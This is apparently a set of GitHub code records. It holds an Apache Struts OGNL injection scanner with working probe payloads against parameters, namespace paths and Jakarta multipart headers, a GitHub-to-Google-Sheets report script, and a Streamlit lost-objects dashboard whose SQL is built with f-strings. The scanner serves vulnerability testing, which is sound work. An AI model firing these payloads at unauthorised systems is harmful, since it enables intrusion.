+{"seq_id": "31463177394", "text": "#!/usr/bin/python3\n\nimport sys\nimport requests\nimport argparse\nfrom urllib.parse import urlparse, parse_qs, quote, unquote\nfrom http.cookies import SimpleCookie\nimport re\nimport copy\nfrom colorama import Fore, Style\n\nbracket = f\"{Fore.BLUE}[{Fore.GREEN}*{Fore.BLUE}]{Style.RESET_ALL}\"\nbracket_err = f\"{Fore.BLUE}[{Fore.RED}*{Fore.BLUE}]{Style.RESET_ALL}\"\n\nif len(sys.argv) <= 1:\n print(bracket, 'Struts2Scanner - gh0st27')\n print('\\n%s -h for help.' % (sys.argv[0]))\n exit()\n\ndef get_parser():\n parser = argparse.ArgumentParser(prog='Struts2Scanner.py', usage='Struts2Scanner.py [options] --url \"http://www.site.com/vuln.php?id=1\"')\n parser.add_argument('-u', '--url',\n dest=\"url\",\n help='Target URL (e.g.\"http://www.site.com/vuln.php?id=1&fname=test&lname=tester\")',\n action='store'\n )\n parser.add_argument('--data', dest='data',\n help='Data string to be sent through POST (e.g. \"id=1&fname=test&lname=tester\")', action='store'\n )\n parser.add_argument('--cookies', dest='cookies',\n help='HTTP cookies (eg. \"jsessionid=1234\")',action='store'\n )\n# parser.add_argument('-p', dest='testparam',\n# help='testable parameter',action='store'\n# )\n parser.add_argument('--proxy', dest='proxy', help='Use a proxy to connect to the target URL',\n action='store'\n )\n\n return parser\n\ndef do_Multipart_Post_Request(ttarget, multipart_payload, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n boundary = \"---------------------------735323031399963166993862150\"\n content_type = \"multipart/form-data; boundary=%s\" % (boundary)\n filename = \"gh0st\"\n payload = \"--%s\\r\\nContent-Disposition: form-data; name=\\\"%s\\\"; filename=\\\"%s\\0b\\\"\\r\\nContent-Type: text/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (boundary, filename, str(multipart_payload), boundary)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Content-Type': content_type\n }\n try:\n output = b\"\"\n with requests.post(ttarget, payload, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=headers, verify=False, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef do_Get(ttarget, dict_params, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n try:\n output = b\"\"\n with requests.post(ttarget, params=dict_params, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=hheaders, verify=verify, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef do_Post(ttarget, raw_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n try:\n output = b\"\"\n with requests.post(ttarget, data=raw_data, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=hheaders, verify=verify, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef main():\n 
parser = get_parser()\n args = vars(parser.parse_args())\n url, data, cookies, proxy = args['url'], args['data'],args['cookies'], args['proxy']\n\n # parse url & query string\n parsed_url = urlparse(url)\n target_url = parsed_url.geturl()\n query_param = parse_qs(parsed_url.query)\n\n if parsed_url.scheme == 'http':\n ns_target = parsed_url.scheme + \"://\" + parsed_url.netloc\n elif parsed_url.scheme =='https':\n ns_target = parsed_url.scheme + \"://\" + parsed_url.netloc\n else:\n print(bracket_err, 'Target URL must start with http or https (e.g.\"http://www.site.com/vuln.php\" )')\n exit()\n\n path = parsed_url.path\n\n #convert cookie into dictionay if present\n if cookies is not None:\n cookie = SimpleCookie()\n cookie.load(cookies)\n cookies = {}\n for key, morsel in cookie.items():\n cookies[key] = morsel.value\n else:\n cookies = None\n\n #Setup proxy listener\n if proxy is not None and proxy != '':\n proxies = {\n 'http': 'http://%s' % (proxy),\n 'https': 'http://%s' % (proxy)\n }\n else:\n proxies = None\n\n #convert post data to dictionary if present\n if data is not None:\n data = data\n else:\n data = None\n\n #Request parameters\n target = parsed_url.geturl()\n timeout = 5\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n allow_redirects = True\n verify = False\n dict_cookies = cookies\n proxies_listener = proxies\n dict_param = query_param\n raw_data = data\n\n #checking for ambigiuos request\n if raw_data is not None and bool(dict_param):\n print(bracket_err, \"Malformed Request Found.\\n Exiting......\")\n exit()\n\n check(target, ns_target, path, raw_data, dict_param, timeout, headers, allow_redirects, verify, dict_cookies, proxies_listener)\n\ndef check(target, ns_target, path, raw_data, dict_param, timeout, headers, allow_redirects, verify, dict_cookies, proxies_listener):\n\n #OGNL Injection\n ttarget = copy.copy(target)\n hheaders = headers.copy()\n check_payload = 'ghost${\"zkzz\".toString().replace(\"k\", \"z\")}'\n if raw_data is not None:\n data_url_decoded = unquote(raw_data)\n dict_data = dict(subString.split(\"=\") for subString in data_url_decoded.split(\"&\"))\n for key in dict_data.keys():\n temp_dict_data = dict_data.copy()\n temp_dict_data[key] = check_payload\n# print('Checking POST parameter {} for OGNL Injection using payload \" {} \" '.format(key, check_payload))\n output, r_headers = do_Post(ttarget, temp_dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"POST parameter '{}' is vulnerable OGNL Injection\".format(key))\n else:\n print(bracket_err, \"POST parameter '{}' is not vulnerable to OGNL Injectin\".format(key))\n temp_dict_data.clear()\n else:\n for key in dict_param.keys():\n temp = dict_param.copy()\n temp[key] = check_payload\n# print('Checking GET parameter {} for OGNL Injection using payload \" {} \" '.format(key, check_payload))\n output, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"GET Query paramater '{}' is vulnerable OGNL Injection\".format(key))\n else:\n print(bracket_err, \"GET Query Parameter '{}' is not vulnerable to OGNL Injectin\".format(key))\n temp.clear()\n\n #checking for namespace redirect cve-2018-11776\n if raw_data is not 
None:\n del ttarget\n ttarget = ns_target + \"/\" + quote(check_payload) + path\n # print('Checking Namespace Redirect OGNL Injection using payload \" {} \" '.format(check_payload))\n output, r_headers = do_Post(ttarget, dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"Target is vulnerable to Namespace Redirect OGNL Injection\")\n else:\n print(bracket_err, \"Target is not vulnerable to Namespace Redirect OGNL Injection\")\n\n else:\n del ttarget\n ttarget = ns_target + \"/\" + quote(check_payload) + path\n # print('Checking Namespace Redirect OGNL Injection using payload \" {} \" '.format(check_payload))\n output, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"Target is vulnerable to Namespace Redirect OGNL Injection\")\n else:\n print(bracket_err, \"Target is not vulnerable to Namespace Redirect OGNL Injection\")\n\n # Checking for Jakarta Multipart parser OGNL Injection - Content type header\n multipart_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('strutsExploiter','gh0st27')}.multipart/form-data\"\n hheaders['Content-Type'] = str(multipart_payload)\n del ttarget\n ttarget = target\n if raw_data is not None:\n# print('Checking Jakarta Multipart parser OGNL Injection on Content Type header')\n payload, r_headers = do_Post(ttarget, dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n# print('Checking Jakarta Multipart parser OGNL Injection on Content Type header')\n payload, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n hheaders.clear()\n\n # Checking for Jakarta Multipart parser OGNL Injection - Content disposition header\n ttarget = copy.copy(target)\n payload, r_headers = do_Multipart_Post_Request(ttarget, multipart_payload, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta based file upload Multipart parser on Content Disposition\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta based file upload Multipart on Content Disposition\")\n\n\nif __name__ =='__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('\\n', bracket_err, 'KeyboardInterrupt Detected.')\n print(bracket_err, 'Exiting...')\n exit()\n", "repo_name": "gh0st27/Struts2Scanner", "sub_path": "Struts2Scanner.py", "file_name": "Struts2Scanner.py", "file_ext": "py", "file_size_in_byte": 11510, "program_lang": "python", "lang": "en", "doc_type": "code", 
"stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "colorama.Fore.BLUE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 12, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 12, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 13, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 57, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 70, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 79, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 95, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 97, "usage_type": "call"}, {"api_name": "http.cookies.SimpleCookie", "line_number": 111, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 158, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 162, "usage_type": "call"}, {"api_name": "re.search", "line_number": 169, "usage_type": "call"}, {"api_name": "re.search", "line_number": 181, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 191, "usage_type": "call"}, {"api_name": "re.search", "line_number": 194, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 202, "usage_type": "call"}, {"api_name": "re.search", "line_number": 205, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 235, "usage_type": "call"}]}
+{"seq_id": "5358260746", "text": "from .github import GitHubApi, GitHubReportSource\n\nimport argparse\nimport yaml\nimport json\nimport os\nimport datetime\nimport pytz\nimport pandas\nimport pygsheets\nimport sys\n\ndef _read_staff_list(sh):\n ret = []\n wks = sh.worksheet_by_title('team_list')\n df = wks.get_as_df()\n headings = ['name', 'git_email', 'github_user', 'slack_username', 'team']\n for index, row in df.iterrows():\n entry = {h: row[h] for h in headings}\n ret.append(entry)\n return ret\n\ndef _get_staff_map(sh, from_field, to_field):\n staff = _read_staff_list(sh)\n ret = {m[from_field]: m[to_field] for m in staff if m[from_field] != ''}\n return pandas.DataFrame(list(ret.items()), columns=[from_field, to_field])\n\ndef git_author_to_team_map(sh):\n return _get_staff_map(sh, 'git_email', 'team')\n\ndef github_user_to_team_map(sh):\n return _get_staff_map(sh, 'github_user', 'team')\n\ndef _get_on_hold_branches(sh):\n wks = sh.worksheet_by_title('on_hold_branches')\n ret = []\n df = wks.get_as_df()\n for index, row in df.iterrows():\n ret.append(row['branch'])\n return ret\n\ndef _validate_google_sheets(sh):\n \"\"\"Throws an exception if missing any sheets.\"\"\"\n for tabname in ['on_hold_branches', 'team_list', 'branches', 'pull_reqs']:\n print(\" {t}\".format(t=tabname))\n wks = sh.worksheet_by_title(tabname)\n\ndef create_report(config, github_creds):\n def get_valid_env_var(name):\n ret = os.environ[name]\n if (ret is None or ret.strip() == ''):\n print(\"Missing {name} env variable\".format(name = name))\n sys.exit()\n return ret\n\n account = github_creds['account_name']\n token = github_creds['github_token']\n github_api = GitHubApi(account, token)\n\n reference_date = datetime.datetime.now()\n toronto = pytz.timezone('America/Toronto')\n reference_date = pytz.utc.localize(reference_date)\n\n print('Start.')\n print('Authorizing google sheets')\n sys.stdout.flush()\n gc = pygsheets.authorize(no_cache=True)\n sheetname = config['google_sheets_filename']\n sh = gc.open(sheetname)\n\n print(\"Validating structure of {sheetname}\".format(sheetname = sheetname))\n _validate_google_sheets(sh)\n\n print('Reading branches to exclude')\n exclude_branches = _get_on_hold_branches(sh)\n\n def dump_dataframe(title, df):\n wks = sh.worksheet_by_title(title)\n wks.clear()\n wks.set_dataframe(df,(1,1))\n\n print('Creating report:')\n sys.stdout.flush()\n report_source = GitHubReportSource(config, github_api, reference_date)\n\n print(' Branches')\n sys.stdout.flush()\n df = report_source.get_branches_dataframe().sort_values(by='last_commit_age', ascending=False)\n df = df[~df.branch.isin(exclude_branches)]\n data = pandas.merge(df, git_author_to_team_map(sh), how='left', left_on=['author'], right_on=['git_email'])\n data.fillna(value='', inplace=True)\n dump_dataframe('branches', data)\n\n print(' Pull requests')\n sys.stdout.flush()\n df = report_source.get_pull_requests_dataframe().sort_values(by='pr_age_days', ascending=False)\n data = pandas.merge(df, github_user_to_team_map(sh), how='left', left_on=['user'], right_on=['github_user'])\n data.fillna(value='', inplace=True)\n dump_dataframe('pull_reqs', data)\n\n print('Done.')\n sys.stdout.flush()\n", "repo_name": "jzohrab/github_google_sheets_report", "sub_path": "GitHubReport/report.py", "file_name": "report.py", "file_ext": "py", "file_size_in_byte": 3331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.DataFrame", "line_number": 26, 
"usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}, {"api_name": "github.GitHubApi", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 61, "usage_type": "call"}, {"api_name": "pytz.utc.localize", "line_number": 62, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 66, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygsheets.authorize", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "github.GitHubReportSource", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}]}
+{"seq_id": "5370680426", "text": "import streamlit as st\nimport pandas as pd\nimport plotly.express as px\nimport sqlite3\nimport numpy as np\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\nmap_token = os.getenv('MAPBOX_TOKEN')\nconnexion = sqlite3.connect(\"db_objets_trouves.db\")\npx.set_mapbox_access_token(map_token)\n\n# Sidebar pour sélectionner l'onglet\nonglet = st.sidebar.selectbox(\"Choisissez un onglet\", [\"Histogramme\", \"Carte objet perdu\", \"Carte frequantation\" ,\"Scatter\",\"saison\",\"saison median\", \"histo bar\"])\n\n# Histogramme ///////////////////////////////////////////////////////////////////////////////////////\nif onglet == \"Histogramme\":\n # affichage du titre\n st.title(\"Histogramme des nombre d'objets perdus par rapport a la date et le type d'objets \")\n\n # lire le fichier CSV dans un DataFrame pandas\n df = pd.read_csv(\"objets-trouves.csv\")\n\n # convertir la colonne \"date\" en type datetime\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n # extraire l'année et le mois dans deux colonnes distinctes\n df[\"annee\"] = df[\"date\"].dt.year\n df[\"mois\"] = df[\"date\"].dt.month\n\n # filtrer les données entre 2019 et 2022\n start_date = pd.Timestamp(\"2019-01-01\")\n end_date = pd.Timestamp(\"2022-12-31\")\n df = df[(df[\"date\"] >= start_date) & (df[\"date\"] <= end_date)]\n\n # récupérer les types d'objets uniques\n types_objets = df[\"type d'objet\"].unique()\n\n # Définition de la liste des mois en français\n mois_fr = [\"Tous\", \"Janvier\", \"Février\", \"Mars\", \"Avril\", \"Mai\", \"Juin\", \"Juillet\", \"Août\", \"Septembre\", \"Octobre\", \"Novembre\", \"Décembre\"]\n\n # Définition de la liste des gares\n gares = [\"Tous\", \"Paris Bercy\", \"Paris Saint-Lazare\", \"Paris Gare de Lyon\", \"Paris Gare du Nord\", \"Paris Montparnasse\", \"Paris Est\", \"Paris Austerlitz\"]\n\n # Ajout du sélecteur pour l'année et le mois\n annee = st.selectbox(\"Choisissez une année\", options=range(2019, 2023), index=3) # valeur par défaut : 2022\n mois = st.selectbox(\"Choisissez un mois\", options=mois_fr, index=0) # valeur par défaut : Tous\n\n # Ajout du sélecteur pour la gare\n gare = st.selectbox(\"Choisissez une gare\", options=gares, index=0) # valeur par défaut : Tous\n\n # Ajout du sélecteur pour le type d'objet\n select_type_objet = st.selectbox(\"Choisissez un type d'objet (optionnel)\", options=[\"Tous\"] + list(types_objets))\n if select_type_objet != \"Tous\":\n df = df[df[\"type d'objet\"] == select_type_objet]\n\n # Filtrer les données en fonction de l'année, du mois et de la gare sélectionnés\n if mois == \"Tous\" and gare == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee)]\n elif mois == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"gare\"] == gare)]\n elif gare == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"mois\"] == mois_fr.index(mois))]\n else:\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"mois\"] == mois_fr.index(mois)) & (df[\"gare\"] == gare)]\n\n # Affichage du nombre d'objets perdus dans le titre\n # title = f\"Nombre d'objets perdus en {mois} {annee} à la gare {gare}\"\n # if select_type_objet != \"Tous\":\n # title += f\" pour le type d'objet : {select_type_objet}\"\n # title += f\" il y à {len(filtered_data)} objets\"\n # st.title(title)\n\n # Affichage de l'histogramme dans Streamlit\n st.plotly_chart(px.histogram(filtered_data, x=\"date\", nbins=len(filtered_data), \n labels={\"date\": \"Date\", \"count\": \"Nombre d'objets perdus\"}))\n\n\n # Carte 
///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Carte objet perdu\":\n st.title(\"Objets trouvés dans les gares par type d'objets \")\n \n \n # Connexion à la base de données SQLite\n connexion = sqlite3.connect(\"db_objets_trouves.db\")\n\n # Ajout d'un selecteur pour l'année\n year = st.selectbox(\"Select a year\", [\"2019\", \"2020\", \"2021\", \"2022\"])\n\n # Récupération des types d'objets disponibles dans la table 'objets_trouves'\n objets_trouves_df = pd.read_sql_query(\"SELECT DISTINCT type_objet FROM objets_trouves\", connexion)\n\n # Création d'une liste des types d'objets à afficher dans le selecteur\n objets_trouves_list = [\"Tous\"] + list(objets_trouves_df['type_objet'].values)\n\n # Ajout d'un selecteur pour le type d'objet requis\n objet_type = st.selectbox(\"Select an object type\", objets_trouves_list)\n\n # Récupération des données de la table 'objets_trouves' pour l'année et le type d'objet sélectionnés\n if objet_type == \"Tous\":\n query = f\"SELECT o.*, g.latitude, g.longitude FROM objets_trouves o JOIN gares_objets_perdus g ON o.gare = g.gare WHERE o.date LIKE '{year}-%'\"\n else:\n query = f\"SELECT o.*, g.latitude, g.longitude FROM objets_trouves o JOIN gares_objets_perdus g ON o.gare = g.gare WHERE o.date LIKE '{year}-%' AND o.type_objet = '{objet_type}'\"\n\n df = pd.read_sql_query(query, connexion)\n\n\n\n # Fermeture de la connexion à la base de données SQLite\n connexion.close()\n\n # Calcul de la somme des objets par type\n df_somme = df.groupby('type_objet')['id'].count().reset_index()\n df_somme = df_somme.rename(columns={'id': 'nombre'})\n\n # Affichage de la somme des objets par type\n st.write(df_somme)\n\n # Configuration de l'accès à l'API de Mapbox\n px.set_mapbox_access_token(map_token)\n\n # Création de la carte\n fig = px.scatter_mapbox(df, lat=\"latitude\", lon=\"longitude\", color=\"id\",\n color_continuous_scale=px.colors.sequential.Reds, size_max=10,\n zoom=10,\n hover_name=\"gare\", hover_data={\"date\": True, \"type_objet\": True, \"id\": True})\n\n\n # Ajout du titre avec l'année sélectionnée\n fig.update_layout(title=f\"Objets trouvés dans les gares en {year}\")\n\n # Configuration des annotations pour la colonne 'frequantation' et 'taux_objets_perdus'\n fig.update_traces(hovertemplate=\"%{hovertext} Date: %{customdata[0]} Type d'objet: %{customdata[1]} Nombre d'objets trouvés: %{customdata[2]}\")\n\n # Affichage de la carte dans Streamlit\n st.plotly_chart(fig)\n \n# Carte ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Carte frequantation\":\n st.title(\"Carte frequentation dans les gares de Paris \")\n\n # Connexion à la base de données SQLite\n connexion = sqlite3.connect(\"db_objets_trouves.db\")\n\n # Ajout d'un selecteur pour l'année\n year = st.selectbox(\"Select a year\", [\"2019\", \"2020\", \"2021\", \"2022\"])\n\n # Récupération des données de la table 'objet_perdu_annee' pour l'année sélectionnée\n query = f\"SELECT * FROM gares_objets_perdus WHERE annee = {year}\"\n df = pd.read_sql_query(query, connexion)\n\n # Formatage de la colonne 'frequantation' avec des séparateurs de milliers\n df['frequantation'] = df['frequantation'].apply(lambda x: '{:,}'.format(x))\n\n # Fermeture de la connexion à la base de données SQLite\n connexion.close()\n\n # Configuration de l'accès à l'API de Mapbox\n px.set_mapbox_access_token(map_token)\n\n # Création de la carte\n fig = px.scatter_mapbox(df, lat=\"latitude\", 
lon=\"longitude\", color=\"Nbr_perdu\", size=\"Nbr_perdu\",\n color_continuous_scale=px.colors.cyclical.IceFire, size_max=15,\n center={\"lat\": 48.8566, \"lon\": 2.3522}, zoom=10,\n hover_name=\"gare\", hover_data={\"frequantation\": True, \"Nbr_perdu\": True})\n\n # Ajout du titre avec l'année sélectionnée\n fig.update_layout(title=f\"Objets perdus dans les gares en {year}\")\n\n # Configuration des annotations pour la colonne 'frequantation'\n fig.update_traces(hovertemplate=\"%{hovertext} Frequantation: %{customdata[0]} Objets perdus: %{customdata[1]}\")\n\n # Affichage de la carte dans Streamlit\n st.plotly_chart(fig)\n\n\n# Scatter ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Scatter\":\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # calculer la droite de régression linéaire\n coef = np.polyfit(df[\"temperature\"], df[\"nbr_perdu\"], deg=1)\n poly1d_fn = np.poly1d(coef)\n\n # affichage du titre\n st.title(\"Relation entre la température et le nombre d'objets perdus\")\n\n # affichage du scatterplot avec la droite de régression linéaire\n fig = px.scatter(df, x=\"temperature\", y=\"nbr_perdu\")\n fig.add_scatter(x=df[\"temperature\"], y=poly1d_fn(df[\"temperature\"]), mode=\"lines\", name=\"regression line\")\n st.write(\" Après avoir effectué l'analyse, il n'a pas été trouvé de corrélation significative entre le nombre d'objets perdus et la température. En effet, la droite de régression linéaire obtenue ne montre pas une évolution nette du nombre d'objets perdus en fonction de la température. Ainsi, on peut conclure que la température n'a pas d'impact direct sur le nombre d'objets perdus dans cette étude. 
\")\n # Affichage de la figure dans Streamlit\n st.plotly_chart(fig)\n \n# saison ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"saison\":\n st.title(\"nombre d'objets perdus par saison\")\n\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # convertir la colonne \"date\" en datetime\n df['date'] = pd.to_datetime(df['date'])\n\n # Ajouter une colonne \"saison\" basée sur les mois et les jours\n df['saison'] = pd.cut(df['date'].dt.month + df['date'].dt.day / 100,\n [0, 3.21, 6.21, 9.23, 31.21],\n labels=['hiver', 'printemps', 'été', 'automne'], include_lowest=True)\n\n # Calculer la médiane du nombre d'objets perdus par saison\n mediane_nbr_perdu_par_saison = df.groupby('saison')['nbr_perdu'].median()\n\n \n\n fig = px.histogram(df, x=\"saison\", y=\"nbr_perdu\", color=\"saison\",\n title=\" \")\n fig.update_traces(marker=dict(line=dict(width=0.5, color='DarkSlateGrey')))\n st.plotly_chart(fig)\n \n# saison ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"saison median\":\n # titre de l'application Streamlit\n st.title(\"Distribution du nombre d'objets perdus par saison\")\n\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # convertir la colonne \"date\" en datetime\n df['date'] = pd.to_datetime(df['date'])\n\n # Ajouter une colonne \"saison\" basée sur les mois et les jours\n df['saison'] = pd.cut(df['date'].dt.month + df['date'].dt.day / 100,\n [0, 3.21, 6.21, 9.23, 31.21],\n labels=['hiver', 'printemps', 'été', 'automne'], include_lowest=True)\n\n # Ajouter une colonne \"année\" basée sur la colonne \"date\"\n df['année'] = df['date'].dt.year\n\n # Sélectionner les années disponibles dans les données\n années_disponibles = df['année'].unique()\n\n # Sélectionner l'année à afficher à partir d'un sélecteur\n année_selectionnée = st.selectbox('Sélectionner une année', années_disponibles)\n\n # Filtrer les données pour l'année sélectionnée\n df_année_selectionnée = df[df['année'] == année_selectionnée]\n\n # Calculer la médiane du nombre d'objets perdus par saison pour l'année sélectionnée\n mediane_nbr_perdu_par_saison = df_année_selectionnée.groupby('saison')['nbr_perdu'].median()\n\n # Créer un boxplot avec Plotly Express pour l'année sélectionnée\n fig = px.box(df_année_selectionnée, x=\"saison\", y=\"nbr_perdu\", color=\"saison\",\n title=f\"Distribution du nombre d'objets perdus par saison pour l'année {année_selectionnée}\")\n fig.update_traces(marker=dict(line=dict(width=0.5, color='DarkSlateGrey')))\n st.plotly_chart(fig)\n\n# histo bar ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"histo bar\":\n\n # lire le fichier CSV dans un DataFrame pandas\n df = pd.read_csv(\"objets-trouves.csv\")\n\n # convertir la colonne \"date\" en type datetime\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n # filtrer les données entre 2019 et 2022\n start_date = pd.Timestamp(\"2019-01-01\")\n end_date = pd.Timestamp(\"2022-12-31\")\n # du lundi au dimanche \n df = df[(df[\"date\"] >= start_date) & (df[\"date\"] <= end_date)]\n\n # renommer la colonne \"type d'objet\" en \"Nbr_perdu\"\n df = df.rename(columns={\"type d'objet\": \"Nbr_perdu\"})\n\n # 
grouper les données par semaine et calculer la somme du nombre d'objets pour chaque semaine\n weekly_sum = df.groupby(pd.Grouper(key=\"date\", freq=\"w\"))[\"Nbr_perdu\"].count().reset_index()\n\n # créer la figure avec Plotly\n fig = px.histogram(df, x=\"date\", nbins=len(weekly_sum), color=\"Nbr_perdu\",\n color_discrete_sequence=px.colors.qualitative.Plotly)\n fig.update_layout(xaxis_title=\"Date (Semaine)\", yaxis_title=\"Nombre d'objets perdus\")\n\n # afficher la figure\n st.plotly_chart(fig)", "repo_name": "RolaMmss/Lost-in-translation", "sub_path": "stream_all.py", "file_name": "stream_all.py", "file_ext": "py", "file_size_in_byte": 13352, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 12, "usage_type": "call"}, {"api_name": "plotly.express", 